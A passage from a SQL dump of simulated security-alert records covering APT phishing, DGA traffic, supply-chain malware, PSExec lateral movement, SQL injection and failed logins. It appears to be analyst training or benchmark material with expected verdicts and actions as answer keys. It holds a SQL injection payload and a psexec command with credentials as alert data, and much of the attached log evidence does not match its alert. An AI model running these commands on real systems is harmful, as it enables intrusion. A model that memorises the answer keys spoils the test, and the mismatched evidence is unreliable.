--target=explorer.exe\\\",\\\"file_hash\\\":\\\"9f2c1e9d1e4a2b2b4a6a5f5f4a8e2d9c\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.239Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:24:56Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"command_line\\\":\\\"svchost.exe --inject --target=explorer.exe\\\",\\\"file_hash\\\":\\\"9f2c1e9d1e4a2b2b4a6a5f5f4a8e2d9c\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.239Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:24:56Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"command_line\\\":\\\"svchost.exe --inject --target=explorer.exe\\\",\\\"file_hash\\\":\\\"9f2c1e9d1e4a2b2b4a6a5f5f4a8e2d9c\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.239Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:24:56Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"command_line\\\":\\\"svchost.exe --inject --target=explorer.exe\\\",\\\"file_hash\\\":\\\"9f2c1e9d1e4a2b2b4a6a5f5f4a8e2d9c\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1764, 'Lazarus Group Phishing Campaign Using Spoofed Domains', 'high', 'MISP', 'A phishing email from a domain mimicking a trusted partner was identified, containing a malicious link intended to harvest credentials.', 'Phishing', 'T1566.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T06:45:12Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"username\":\"mwhite\",\"hostname\":\"mail-server-02\",\"email_sender\":\"no-reply@trusted.com\",\"url\":\"http://login.trusted.com/secure-update\"}', '2026-03-15 19:55:37', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP used in multiple phishing campaigns linked to Lazarus Group\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://login.trusted.com/secure-update\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL is a known phishing landing page\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"no-reply@trusted.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email address used in spoofing attempts\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email domain closely resembles a trusted partner, indicating a sophisticated phishing attempt by Lazarus Group.\"}', 'Expert', 'TI', 9, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.241Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:45:12Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"mail-server-02\\\",\\\"email_sender\\\":\\\"no-reply@trusted.com\\\",\\\"url\\\":\\\"http://login.trusted.com/secure-update\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.241Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:45:12Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"mail-server-02\\\",\\\"email_sender\\\":\\\"no-reply@trusted.com\\\",\\\"url\\\":\\\"http://login.trusted.com/secure-update\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.241Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:45:12Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"mail-server-02\\\",\\\"email_sender\\\":\\\"no-reply@trusted.com\\\",\\\"url\\\":\\\"http://login.trusted.com/secure-update\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.241Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:45:12Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"mail-server-02\\\",\\\"email_sender\\\":\\\"no-reply@trusted.com\\\",\\\"url\\\":\\\"http://login.trusted.com/secure-update\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.241Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:45:12Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"mail-server-02\\\",\\\"email_sender\\\":\\\"no-reply@trusted.com\\\",\\\"url\\\":\\\"http://login.trusted.com/secure-update\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1765, 'Cozy Bear APT29 DGA Domain Communication Detected', 'critical', 'Recorded Future', 'Network traffic analysis revealed communication with a domain generated by a Domain Generation Algorithm (DGA) associated with Cozy Bear.', 'Data Exfil', 'T1071.004', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:30:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.55\",\"hostname\":\"workstation-07\",\"domain\":\"xj3slkjv.com\"}', '2026-03-15 19:55:37', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with DGA domains used by Cozy Bear\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"xj3slkjv.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"DGA domain linked to Cozy Bear C2 infrastructure\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal workstation IP\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The detected DGA domain is known to be used by Cozy Bear for covert data exfiltration.\"}', 'Expert', 'TI', 9, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.244Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.55\\\",\\\"hostname\\\":\\\"workstation-07\\\",\\\"domain\\\":\\\"xj3slkjv.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.244Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.55\\\",\\\"hostname\\\":\\\"workstation-07\\\",\\\"domain\\\":\\\"xj3slkjv.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.244Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.55\\\",\\\"hostname\\\":\\\"workstation-07\\\",\\\"domain\\\":\\\"xj3slkjv.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.244Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.55\\\",\\\"hostname\\\":\\\"workstation-07\\\",\\\"domain\\\":\\\"xj3slkjv.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.244Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.55\\\",\\\"hostname\\\":\\\"workstation-07\\\",\\\"domain\\\":\\\"xj3slkjv.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1766, 'Fancy Bear APT28 Supply Chain Attack via GitHub', 'high', 'Anomali', 'APT28 utilized a compromised GitHub repository to deliver a malicious update, executing a payload on the victim\'s system.', 'Malware', 'T1195', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:17:31Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.101\",\"dst_ip\":\"10.1.1.100\",\"username\":\"admin\",\"hostname\":\"update-server\",\"file_hash\":\"abc1234567890def1234567890abcdef\",\"command_line\":\"malicious_update.exe\"}', '2026-03-15 19:55:37', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with Fancy Bear\'s supply chain attacks\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"abc1234567890def1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malicious update file used in supply chain attack\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"malicious_update.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Execution of malicious payload\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"APT28 is known for supply chain attacks using compromised repositories.\"}', 'Expert', 'TI', 9, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.246Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:17:31Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"10.1.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"update-server\\\",\\\"file_hash\\\":\\\"abc1234567890def1234567890abcdef\\\",\\\"command_line\\\":\\\"malicious_update.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.246Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:17:31Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"10.1.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"update-server\\\",\\\"file_hash\\\":\\\"abc1234567890def1234567890abcdef\\\",\\\"command_line\\\":\\\"malicious_update.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.246Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:17:31Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"10.1.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"update-server\\\",\\\"file_hash\\\":\\\"abc1234567890def1234567890abcdef\\\",\\\"command_line\\\":\\\"malicious_update.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.246Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:17:31Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"10.1.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"update-server\\\",\\\"file_hash\\\":\\\"abc1234567890def1234567890abcdef\\\",\\\"command_line\\\":\\\"malicious_update.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.246Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:17:31Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"10.1.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"update-server\\\",\\\"file_hash\\\":\\\"abc1234567890def1234567890abcdef\\\",\\\"command_line\\\":\\\"malicious_update.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1767, 'Lateral Movement Detected via PSExec', 'critical', 'Wazuh', 'An unauthorized PSExec execution was detected indicating potential lateral movement within the network.', 'Lateral Movement', 'T1569.002', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T14:05:23Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.10.5\",\"dst_ip\":\"192.168.10.20\",\"username\":\"hacker\",\"hostname\":\"compromised-host\",\"command_line\":\"psexec \\\\\\\\192.168.10.20 -u admin -p password cmd.exe\"}', '2026-03-15 19:55:37', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal source IP for PSExec\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Target IP for lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\192.168.10.20 -u admin -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"PSExec command indicating lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PSExec usage indicates lateral movement attempt within the network.\"}', 'Expert', 'TI', 9, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.248Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:05:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.5\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"username\\\":\\\"hacker\\\",\\\"hostname\\\":\\\"compromised-host\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.10.20 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.248Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:05:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.5\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"username\\\":\\\"hacker\\\",\\\"hostname\\\":\\\"compromised-host\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.10.20 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.248Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:05:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.5\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"username\\\":\\\"hacker\\\",\\\"hostname\\\":\\\"compromised-host\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.10.20 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.248Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:05:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.5\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"username\\\":\\\"hacker\\\",\\\"hostname\\\":\\\"compromised-host\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.10.20 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.248Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:05:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.5\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"username\\\":\\\"hacker\\\",\\\"hostname\\\":\\\"compromised-host\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.10.20 -u admin -p password cmd.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1768, 'Suspicious Web Request Detected - Possible SQL Injection', 'medium', 'Firewall', 'A suspicious web request was detected containing patterns indicative of SQL injection targeting a sensitive database endpoint.', 'Web Attack', 'T1190', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T12:30:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.0.2.100\",\"dst_ip\":\"203.0.113.200\",\"username\":\"webuser\",\"hostname\":\"web-server-01\",\"request_body\":\"\' OR \'1\'=\'1\' --\",\"url\":\"/login\"}', '2026-03-15 19:55:37', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP flagged for unusual web requests\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Potential SQL injection pattern\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"Although the request contains SQL patterns, it was a test query by a security team.\"}', 'Expert', 'TI', 9, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1769, 'Anomalous Login Attempt from Foreign IP', 'medium', 'Splunk', 'Multiple failed login attempts were detected from an IP address originating outside the usual geographical location of the user.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T08:50:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.40\",\"dst_ip\":\"10.10.10.10\",\"username\":\"jdoe\",\"hostname\":\"auth-server\",\"failed_attempts\":12}', '2026-03-15 19:55:37', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.40\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP noted for failed login attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login attempts were traced back to a legitimate user who was traveling.\"}', 'Expert', 'TI', 9, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.252Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.40\\\",\\\"dst_ip\\\":\\\"10.10.10.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"auth-server\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-03-15T20:57:16.252Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.40\\\",\\\"dst_ip\\\":\\\"10.10.10.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"auth-server\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-03-15T20:56:16.252Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.40\\\",\\\"dst_ip\\\":\\\"10.10.10.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"auth-server\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-03-15T20:55:16.252Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.40\\\",\\\"dst_ip\\\":\\\"10.10.10.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"auth-server\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-03-15T20:54:16.252Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.40\\\",\\\"dst_ip\\\":\\\"10.10.10.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"auth-server\\\",\\\"failed_attempts\\\":12}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1770, 'APT41 Spear-Phishing Attempt Detected', 'critical', 'Proofpoint', 'A spear-phishing email from a known APT41-associated domain was detected targeting healthcare employees. The email contained a link to a malicious document hosted on a compromised GitHub repository.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T08:45:12Z\",\"event_type\":\"email_received\",\"src_ip\":\"45.76.123.84\",\"dst_ip\":\"192.168.1.100\",\"username\":\"jdoe@examplehospital.com\",\"hostname\":\"mailserver01\",\"email_sender\":\"alerts@securelogin-support.com\",\"url\":\"https://github.com/malicious-repo/document\"}', '2026-03-15 19:56:28', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.76.123.84\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1023 times for phishing 